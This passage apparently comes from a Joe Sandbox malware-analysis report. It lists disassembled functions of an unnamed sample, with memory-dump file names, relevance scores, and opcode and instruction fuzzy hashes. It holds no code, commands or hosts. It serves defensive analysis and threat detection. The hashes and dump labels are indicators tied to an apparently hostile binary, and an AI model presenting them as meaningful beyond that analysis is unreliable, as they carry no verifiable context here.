                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6|?
                                    • API String ID: 0-4174404950
                                    • Opcode ID: 16a74f70aaf1d4b1b9bf571c86a888cd0d2f7989550d44cef6d39696cb3d16f8
                                    • Instruction ID: 61866b93b695520427de507e02badce7873c1ab67340fd31db6d2aa565871cdb
                                    • Opcode Fuzzy Hash: 16a74f70aaf1d4b1b9bf571c86a888cd0d2f7989550d44cef6d39696cb3d16f8
                                    • Instruction Fuzzy Hash: B64146F3A082145FE3046E29DC5277ABAD9EBE0324F2B463DD98183744FAB5580582C6
                                    Function 00FA181A Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Dju
                                    • API String ID: 0-3820036852
                                    • Opcode ID: 43a016d47f36d4f577fe84d604d937bcbaa7f4e56c6206ce091ecf2c39a01219
                                    • Instruction ID: e2c8a954ad4167a5788f69942d820d6cfd6a1b915c5243a06bc10ea61647eff9
                                    • Opcode Fuzzy Hash: 43a016d47f36d4f577fe84d604d937bcbaa7f4e56c6206ce091ecf2c39a01219
                                    • Instruction Fuzzy Hash: 8341D6F3B186009FF301593DED8572ABBDADBD4720F2A863DE684C3784E53958068652
                                    Function 00BFE544 Relevance: .8, Instructions: 823COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction ID: 186d64eda762013e3945ac0b0c3531f7906e8f25a55e290cdf2575bbbcef0a55
                                    • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction Fuzzy Hash: B48201B5900F448FD365CF29C880BA2B7E1BF59300F548A6EE9EA9B751DB30B549CB50
                                    Function 00C18E78 Relevance: .6, Instructions: 649COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                    • Instruction ID: c7f5bffe1a56cbbc3a25773bef92931c8de865deffc47029b7da6a34f60dccd5
                                    • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                    • Instruction Fuzzy Hash: D342A0706047418FC725CF19C0A06A5FBE2FF9B310F288A6ED49A8B791C635E9C5EB51
                                    Function 00C4AC28 Relevance: .5, Instructions: 501COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                    • Instruction ID: 6784b3df2e685ca278c49b9951371a9086fab6b858f36ffe2e206b67408a6fe7
                                    • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                    • Instruction Fuzzy Hash: 7D02F571E002168FDB11CF69C8906BFBBE2BF9A354F15832AE815B7251D771AD828790
                                    Function 00C298B8 Relevance: .5, Instructions: 482COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                    • Instruction ID: cc51fd99a90d52e85a9dde217e379222d729e720ee1656e7a65016128c8e6949
                                    • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                    • Instruction Fuzzy Hash: B4021174A083158FDB14DF29E880369B7E1EFA5310F18872DECA9977A2D731E9858B41
                                    Function 00C166C8 Relevance: .4, Instructions: 418COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                    • Instruction ID: e4c84b3f001f4b265d7ddb65c904d9f8dd768a4ba5544f8cd9bed800f7b3b0cb
                                    • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                    • Instruction Fuzzy Hash: 56F17BB650C6914BC71D9A1484B08BD7FD29FAA201F0E86ADFDD70F383D924DA06EB51
                                    Function 00C5B308 Relevance: .4, Instructions: 415COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                    • Instruction ID: afb0215ffe2f81da0f14ff3dad06e3b5dba04ff4c923c2c7fdfef4acedf8911e
                                    • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                    • Instruction Fuzzy Hash: 3CD1C877F10A254BEB08CE99CC913ADB6E2EBD8350F19413ED916F7381DAB89D018794
                                    Function 00C40B88 Relevance: .4, Instructions: 378COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                    • Instruction ID: 035755b4cd4ac950e58264b579bf9c9d6d53889b78db2e7a7c2067a08c2c7c04
                                    • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                    • Instruction Fuzzy Hash: FCD1E472E406198BDF24CFA8C8847EEB7B1FF49310F248239EA65A7291D7345D4ACB51
                                    Function 00C2B8A8 Relevance: .4, Instructions: 376COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                    • Instruction ID: f6d8e0f567673e9dc0f9e9894a775415c33e82af60615a8741f20de2d1dc889b
                                    • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                    • Instruction Fuzzy Hash: DB026974E006598FCF26CFA8C4905EDBBB6FF8D310F548159E8996B355C730AA91CB90
                                    Function 00C2BD68 Relevance: .4, Instructions: 372COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                    • Instruction ID: 3b6cecc3a039a4c13b08257c89d27522ef4a4e9b4a3470bc32a03d3fcd4feb73
                                    • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                    • Instruction Fuzzy Hash: 6D022375E00A19CFCF15CF98D4809ADB7B6FF88350F258169E81AAB351D731AA91CF90
                                    Function 00C4A648 Relevance: .3, Instructions: 339COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                    • Instruction ID: 1c3a2287d7b6469a59d91ede5cb72607c590c93637ddc26d26fb36f483a6bdee
                                    • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                    • Instruction Fuzzy Hash: 6BC16A76E29B824BD713873DD802265F795BFE7294F15D72EFCE472982FB2096818204
                                    Function 00C3AD38 Relevance: .3, Instructions: 302COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
